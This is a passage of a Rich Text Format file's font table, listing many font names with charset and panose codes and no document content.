{\f214\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century Schoolbook CE;}{\f215\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Schoolbook Tur;}
{\f216\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Schoolbook Baltic;}{\f217\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}CG Omega CE;}{\f218\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}CG Omega Tur;}
{\f219\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}CG Omega Baltic;}{\f220\froman\fcharset238\fprq2{\*\panose 00000000000000000000}CG Times CE;}{\f221\froman\fcharset162\fprq2{\*\panose 00000000000000000000}CG Times Tur;}
{\f222\froman\fcharset186\fprq2{\*\panose 00000000000000000000}CG Times Baltic;}{\f223\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Clarendon Condensed CE;}{\f224\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Tur;}
{\f225\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Baltic;}{\f226\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Coronet CE;}{\f227\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Coronet Tur;}
{\f228\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Coronet Baltic;}{\f229\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Garamond CE;}{\f230\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Garamond Cyr;}
{\f231\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Garamond Greek;}{\f232\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Garamond Tur;}{\f233\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Garamond Baltic;}
{\f234\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Letter Gothic CE;}{\f235\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Letter Gothic Tur;}{\f236\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Letter Gothic Baltic;}
{\f237\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Marigold CE;}{\f238\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Marigold Tur;}{\f239\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Marigold Baltic;}
{\f240\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Monotype Corsiva CE;}{\f241\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Cyr;}
{\f242\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Greek;}{\f243\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Tur;}
{\f244\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Baltic;}{\f245\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers CE;}{\f246\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Tur;}
{\f247\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Baltic;}{\f248\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers Condensed CE;}{\f249\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Condensed Tur;}
{\f250\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Condensed Baltic;}{\f251\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Georgia CE;}{\f252\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Georgia Cyr;}
{\f253\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Georgia Greek;}{\f254\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Georgia Tur;}{\f255\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Georgia Baltic;}
{\f256\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Trebuchet MS CE;}{\f257\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Trebuchet MS Tur;}{\f258\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Andale Mono CE;}
{\f259\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Andale Mono Cyr;}{\f260\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Andale Mono Greek;}{\f261\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Andale Mono Tur;}
{\f262\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Andale Mono Baltic;}{\f263\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Western;}
{\f264\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Unicode MS CE;}{\f265\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Cyr;}
{\f266\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Greek;}{\f267\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Tur;}
{\f268\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Hebrew);}{\f269\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Arabic);}
{\f270\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Baltic;}{\f271\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Haettenschweiler CE;}
{\f272\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Haettenschweiler Cyr;}{\f273\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Haettenschweiler Greek;}
{\f274\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Haettenschweiler Tur;}{\f275\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Haettenschweiler Baltic;}{\f276\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}HoratioDMed Tur;}
{\f277\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}@MS Mincho Western;}{\f278\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}@MS Mincho CE;}{\f279\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}@MS Mincho Cyr;}
{\f280\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}@MS Mincho Greek;}{\f281\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}@MS Mincho Tur;}{\f282\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}@MS Mincho Baltic;}
{\f283\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}@SimSun Western;}{\f284\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Charcoal;}{\f285\fnil\fcharset256\fprq2{\*\panose 03020702040506060504}Apple Chancery;}
{\f286\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Aristocrat LET;}{\f287\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bertram LET;}{\f288\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bickley Script LET;}
{\f289\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}BlairMdITC TT-Medium;}{\f290\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni Ornaments ITC TT;}
{\f291\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo ITC TT-Bold;}{\f292\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-Book;}
{\f293\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-BookIta;}{\f294\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo OS ITC TT-Bold;}
{\f295\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-Book;}{\f296\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-BookIt;}
{\f297\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bordeaux Roman Bold LET;}{\f298\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bradley Hand ITC TT-Bold;}{\f299\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Capitals;}
{\f300\fnil\fcharset256\fprq2{\*\panose 020b0806080604040204}Chicago;}{\f301\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Gadget;}{\f302\fnil\fcharset256\fprq2{\*\panose 02030602050506020203}Hoefler Text;}
{\f303\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Hoefler Text Ornaments;}{\f304\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-Light;}
{\f305\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-LightIta;}{\f306\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-MedIta;}
{\f307\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-Medium;}{\f308\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Jokerman LET;}{\f309\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}LunaITC TT-Bold;}
{\f310\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Machine ITC TT;}{\f311\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Mona Lisa Solid ITC TT;}{\f312\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Monaco;}
{\f313\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Palatino;}{\f314\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Party LET;}{\f315\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}PortagoITC TT;}
{\f316\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Sand;}{\f317\fnil\fcharset256\fprq2{\*\panose 020d0502020204020204}Skia;}{\f318\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans ITC TT-Bold;}
{\f319\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-Semi;}{\f320\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-SemiIta;}
{\f321\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans OS ITC TT-Bold;}{\f322\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITC TT-Semi;}
{\f323\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITCTT-SemiIta;}{\f324\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans SC ITC TT-Semi;}{\f325\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Techno;}
{\f326\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Textile;}{\f327\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}TremorITC TT;}{\f328\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Wanted LET;}{\f329\fnil\fcharset256\fprq2 VT100;}
}{\*\ud{\fonttbl{\f0\fnil\fcharset256\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fnil\fcharset256\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fnil\fcharset256\fprq2{\*\panose 02070309020205020404}Courier New;}
{\f3\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}Symbol;}{\f4\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Times;}{\f5\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Helvetica{\*\falt Arial};}
{\f6\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Courier;}{\f7\fnil\fcharset256\fprq2{\*\panose 020b0503030404040204}Geneva;}{\f8\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Tms Rmn;}
{\f9\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}Helv;}{\f10\froman\fcharset77\fprq2{\*\panose 00000000000000000000}MS Serif;}{\f11\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}MS Sans Serif;}
{\f12\fnil\fcharset256\fprq2{\*\panose 02020502060305060204}New York;}{\f13\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}System;}{\f14\fnil\fcharset2\fprq2{\*\panose 05020102010804080708}Wingdings;}
{\f15\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Roman font face;}{\f16\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Modern font face;}
{\f17\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Roman font face;}{\f18\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Modern font face;}{\f19\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Century;}
{\f20\froman\fcharset128\fprq1{\*\panose 00000000000000000000}Mincho{\*\falt ??};}{\f21\froman\fcharset129\fprq2{\*\panose 02030600000101010101}Batang{\*\falt ??};}{\f22\fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??};}
{\f23\froman\fcharset136\fprq2{\*\panose 02020300000000000000}PMingLiU{\*\falt ????};}{\f24\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}Gothic{\*\falt ?????};}{\f25\fmodern\fcharset129\fprq1{\*\panose 00000000000000000000}Dotum{\*\falt ??};}
{\f26\fmodern\fcharset134\fprq1{\*\panose 00000000000000000000}SimHei{\*\falt ??};}{\f27\fmodern\fcharset136\fprq1{\*\panose 00000000000000000000}MingLiU{\*\falt ???};}
{\f28\fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?? ??};}{\f29\froman\fcharset129\fprq1{\*\panose 00000000000000000000}Gulim{\*\falt ??};}
{\f30\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}MS Gothic{\*\falt ?? ????};}{\f31\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f32\fnil\fcharset256\fprq2{\*\panose 020b0a04020102020204}Arial Black;}
{\f33\fmodern\fcharset256\fprq1{\*\panose 020b0509030504030204}Lucida Sans Typewriter{\*\falt Andale Mono};}{\f34\fnil\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana;}
{\f35\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana Ref{\*\falt Verdana};}{\f36\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}Fixedsys;}{\f37\fmodern\fcharset255\fprq1{\*\panose 00000000000000000000}Terminal;}
{\f38\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Small Fonts;}{\f39\fnil\fcharset2\fprq2{\*\panose 00000000000000000000}Marlett;}{\f40\fswiss\fcharset256\fprq2{\*\panose 020b0504020203020204}News Gothic MT;}
{\f41\fscript\fcharset256\fprq2{\*\panose 03010101010101010101}Lucida Handwriting;}{\f42\fswiss\fcharset256\fprq2{\*\panose 020b0602030504090204}Lucida Sans;}{\f43\fswiss\fcharset256\fprq2{\*\panose 020b0602030504020204}Lucida Sans Unicode;}
{\f44\froman\fcharset256\fprq2{\*\panose 02040602050305030304}Book Antiqua;}{\f45\fswiss\fcharset256\fprq2{\*\panose 020b0502020202020204}Century Gothic;}{\f46\fmodern\fcharset256\fprq1{\*\panose 02010509020102010303}OCR A Extended;}
{\f47\froman\fcharset256\fprq2{\*\panose 02040603050505030304}Calisto MT;}{\f48\fswiss\fcharset256\fprq2{\*\panose 020b0306030101010103}Abadi MT Condensed Light;}{\f49\fswiss\fcharset256\fprq2{\*\panose 020e0705020206020404}Copperplate Gothic Bold;}
{\f50\fswiss\fcharset256\fprq2{\*\panose 020e0507020206020404}Copperplate Gothic Light;}{\f51\fdecor\fcharset256\fprq2{\*\panose 04040403030d02020704}Matisse ITC;}{\f52\fdecor\fcharset256\fprq2{\*\panose 04020404030d07020202}Tempus Sans ITC;}
{\f53\fdecor\fcharset256\fprq2{\*\panose 04040506030f02020702}Westminster;}{\f54\fmodern\fcharset256\fprq1{\*\panose 020b0609040504020204}Lucida Console;}{\f55\fnil\fcharset256\fprq2{\*\panose 030f0702030302020204}Comic Sans MS;}
{\f56\fnil\fcharset256\fprq2{\*\panose 020b0806030902050204}Impact;}{\f57\fnil\fcharset2\fprq2{\*\panose 05030102010509060703}Webdings;}{\f58\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarBats;}
{\f59\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarMath;}{\f60\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Arioso;}{\f61\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}ChevaraOutline;}
{\f62\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Chevara;}{\f63\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Conga;}{\f64\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}HelmetCondensed;}
{\f65\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Helmet;}{\f66\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Timmons;}{\f67\fswiss\fcharset256\fprq2{\*\panose 020e0802040304020204}Albertus Extra Bold;}
{\f68\fswiss\fcharset256\fprq2{\*\panose 020e0602030304020304}Albertus Medium;}{\f69\fswiss\fcharset256\fprq2{\*\panose 020b0603020204030204}Antique Olive;}{\f70\fswiss\fcharset256\fprq2{\*\panose 020b0506020203020204}Arial Narrow;}
{\f71\froman\fcharset256\fprq2{\*\panose 02050604050505020204}Bookman Old Style;}{\f72\froman\fcharset256\fprq2{\*\panose 02040603050505020303}Century Schoolbook;}{\f73\fswiss\fcharset256\fprq2{\*\panose 020b0502050508020304}CG Omega;}
{\f74\froman\fcharset256\fprq2{\*\panose 02020603050405020304}CG Times;}{\f75\froman\fcharset256\fprq2{\*\panose 02040706040705040204}Clarendon Condensed;}{\f76\fscript\fcharset256\fprq2{\*\panose 03030502040406070605}Coronet;}
{\f77\froman\fcharset256\fprq2{\*\panose 02020502050306020203}Garamond;}{\f78\fmodern\fcharset256\fprq1{\*\panose 020b0409020202030204}Letter Gothic;}{\f79\fscript\fcharset256\fprq2{\*\panose 03020702040402020504}Marigold;}
{\f80\fscript\fcharset256\fprq2{\*\panose 03010101010201010101}Monotype Corsiva;}{\f81\fnil\fcharset2\fprq2{\*\panose 01010601010101010101}Monotype Sorts;}{\f82\fswiss\fcharset256\fprq2{\*\panose 020b0603020202030204}Univers;}
{\f83\fswiss\fcharset256\fprq2{\*\panose 020b0606020202060204}Univers Condensed;}{\f84\fnil\fcharset256\fprq2{\*\panose 02040502050405020303}Georgia;}{\f85\fnil\fcharset256\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}
{\f86\fnil\fcharset256\fprq2{\*\panose 020b0509000000000004}Andale Mono;}{\f87\froman\fcharset256\fprq2{\*\panose 00050102010706020507}Map Symbols;}{\f88\fswiss\fcharset128\fprq2{\*\panose 020b0604020202020204}Arial Unicode MS;}
{\f89\fswiss\fcharset256\fprq2{\*\panose 020b0706040902060204}Haettenschweiler;}{\f90\fnil\fcharset2\fprq2{\*\panose 05000000000000000000}MS Outlook;}{\f91\froman\fcharset2\fprq2{\*\panose 05020102010507070707}Wingdings 2;}
{\f92\froman\fcharset2\fprq2{\*\panose 05040102010807070707}Wingdings 3;}{\f93\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}MT Extra;}{\f94\fswiss\fcharset256\fprq2{\*\panose 020b0602020203020303}HoratioDMed;}
{\f95\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Arabic Transparent;}{\f96\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Traditional Arabic;}{\f97\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David;}
{\f98\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David Transparent;}{\f99\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam;}{\f100\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Miriam Fixed;}
{\f101\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Fixed Miriam Transparent;}{\f102\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam Transparent;}{\f103\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Rod;}
{\f104\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}@MS Mincho;}{\f105\fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\f106\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Times New Roman CE;}
{\f107\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Times New Roman Cyr;}{\f108\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Times New Roman Greek;}{\f109\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Times New Roman Tur;}
{\f110\froman\fcharset177\fprq2{\*\panose 00000000000000000000}Times New Roman (Hebrew);}{\f111\froman\fcharset178\fprq2{\*\panose 00000000000000000000}Times New Roman (Arabic);}
{\f112\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Times New Roman Baltic;}{\f113\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial CE;}{\f114\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Cyr;}
{\f115\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Greek;}{\f116\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Tur;}{\f117\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial (Hebrew);}
{\f118\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial (Arabic);}{\f119\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Baltic;}{\f120\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Courier New CE;}
{\f121\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Courier New Cyr;}{\f122\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Courier New Greek;}{\f123\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Courier New Tur;}
{\f124\fmodern\fcharset177\fprq1{\*\panose 00000000000000000000}Courier New (Hebrew);}{\f125\fmodern\fcharset178\fprq1{\*\panose 00000000000000000000}Courier New (Arabic);}
{\f126\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Courier New Baltic;}{\f127\froman\fcharset256\fprq2{\*\panose 00000000000000000000}Batang Western{\*\falt ??};}
{\f128\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Batang CE{\*\falt ??};}{\f129\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Batang Cyr{\*\falt ??};}
{\f130\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Batang Greek{\*\falt ??};}{\f131\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Batang Tur{\*\falt ??};}
{\f132\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Batang Baltic{\*\falt ??};}{\f133\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}SimSun Western{\*\falt ??};}
{\f134\froman\fcharset256\fprq2{\*\panose 00000000000000000000}PMingLiU Western{\*\falt ????};}{\f135\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}MS Mincho Western{\*\falt ?? ??};}
{\f136\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}MS Mincho CE{\*\falt ?? ??};}{\f137\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}MS Mincho Cyr{\*\falt ?? ??};}
{\f138\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}MS Mincho Greek{\*\falt ?? ??};}{\f139\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}MS Mincho Tur{\*\falt ?? ??};}
{\f140\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}MS Mincho Baltic{\*\falt ?? ??};}{\f141\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century CE;}{\f142\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Century Cyr;}
{\f143\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Century Greek;}{\f144\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Tur;}{\f145\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Baltic;}
{\f146\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Tahoma CE;}{\f147\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Tahoma Cyr;}{\f148\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Tahoma Greek;}
{\f149\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma Tur;}{\f150\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Tahoma (Hebrew);}{\f151\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Tahoma (Arabic);}
{\f152\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Tahoma Baltic;}{\f153\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Black CE;}{\f154\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Black Cyr;}
{\f155\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Black Greek;}{\f156\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Black Tur;}{\f157\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Black Baltic;}
{\f158\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana CE;}{\f159\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Cyr;}{\f160\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Greek;}
{\f161\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Tur;}{\f162\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Baltic;}{\f163\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana Ref CE{\*\falt Tahoma};}
{\f164\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Ref Cyr{\*\falt Tahoma};}{\f165\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Ref Greek{\*\falt Tahoma};}
{\f166\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Ref Tur{\*\falt Tahoma};}{\f167\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Ref Baltic{\*\falt Tahoma};}
{\f168\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode CE;}{\f169\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Cyr;}
{\f170\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Greek;}{\f171\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Tur;}
{\f172\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode (Hebrew);}{\f173\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Book Antiqua CE;}{\f174\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Book Antiqua Cyr;}
{\f175\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Book Antiqua Greek;}{\f176\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Book Antiqua Tur;}{\f177\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Book Antiqua Baltic;}
{\f178\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Century Gothic CE;}{\f179\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Century Gothic Cyr;}{\f180\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Century Gothic Greek;}
{\f181\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Century Gothic Tur;}{\f182\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Century Gothic Baltic;}{\f183\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Lucida Console CE;}
{\f184\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Lucida Console Cyr;}{\f185\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Lucida Console Greek;}{\f186\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Lucida Console Tur;}
{\f187\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Comic Sans MS CE;}{\f188\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Comic Sans MS Cyr;}{\f189\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Comic Sans MS Greek;}
{\f190\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Comic Sans MS Tur;}{\f191\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Comic Sans MS Baltic;}{\f192\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Impact CE;}
{\f193\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Impact Cyr;}{\f194\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Impact Greek;}{\f195\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Impact Tur;}
{\f196\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Impact Baltic;}{\f197\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold CE;}{\f198\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Tur;}
{\f199\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Baltic;}{\f200\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Medium CE;}
{\f201\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Medium Tur;}{\f202\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Medium Baltic;}{\f203\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Antique Olive CE;}
{\f204\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Antique Olive Tur;}{\f205\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Antique Olive Baltic;}{\f206\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Narrow CE;}
